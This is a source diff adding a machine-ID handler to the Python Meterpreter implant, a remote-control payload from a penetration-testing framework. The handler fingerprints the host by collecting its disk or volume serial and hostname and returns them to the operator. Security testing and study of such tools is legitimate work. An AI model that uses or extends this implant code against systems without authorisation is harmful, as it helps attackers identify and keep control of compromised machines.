Add machine_id functionality to python meterpreter

Author: OJ

data/meterpreter/meterpreter.py

@@ -1,6 +1,7 @@
 #!/usr/bin/python
 import code
 import os
+import platform
 import random
 import select
 import socket
@@ -141,6 +142,8 @@
 TLV_TYPE_MIGRATE_PID           = TLV_META_TYPE_UINT    | 402
 TLV_TYPE_MIGRATE_LEN           = TLV_META_TYPE_UINT    | 403
 
+TLV_TYPE_MACHINE_ID            = TLV_META_TYPE_STRING  | 460
+
 TLV_TYPE_CIPHER_NAME           = TLV_META_TYPE_STRING  | 500
 TLV_TYPE_CIPHER_PARAMETERS     = TLV_META_TYPE_GROUP   | 501
 
@@ -560,6 +563,36 @@ def handle_dead_resource_channel(self, channel_id):
 		pkt  = struct.pack('>I', len(pkt) + 4) + pkt
 		self.send_packet(pkt)
 
+	def _core_machine_id(self, request, response):
+		serial = ''
+		machine_name = platform.uname()[1]
+		if has_windll:
+			from ctypes import wintypes
+
+			k32 = ctypes.windll.kernel32
+			sys_dir = ctypes.create_unicode_buffer(260)
+			if not k32.GetSystemDirectoryW(ctypes.byref(sys_dir), 260):
+				return ERROR_FAILURE
+
+			vol_buf = ctypes.create_unicode_buffer(260)
+			fs_buf = ctypes.create_unicode_buffer(260)
+			serial_num = wintypes.DWORD(0)
+
+			if not k32.GetVolumeInformationW(ctypes.c_wchar_p(sys_dir.value[:3]),
+					vol_buf, ctypes.sizeof(vol_buf), ctypes.byref(serial_num), None,
+					None, fs_buf, ctypes.sizeof(fs_buf)):
+				return ERROR_FAILURE
+			serial_num = serial_num.value
+			serial = "{0:04x}-{1:04x}".format((serial_num >> 16) & 0xFFFF, serial_num & 0xFFFF)
+		else:
+			for _, _, files in os.walk('/dev/disk/by-id/'):
+				for f in files:
+					if f[:4] == 'ata-':
+						serial = f[4:]
+						break
+		response += tlv_pack(TLV_TYPE_MACHINE_ID, "%s:%s" % (serial, machine_name))
+		return ERROR_SUCCESS, response
+
 	def _core_loadlib(self, request, response):
 		data_tlv = packet_get_tlv(request, TLV_TYPE_DATA)
 		if (data_tlv['type'] & TLV_META_TYPE_COMPRESSED) == TLV_META_TYPE_COMPRESSED: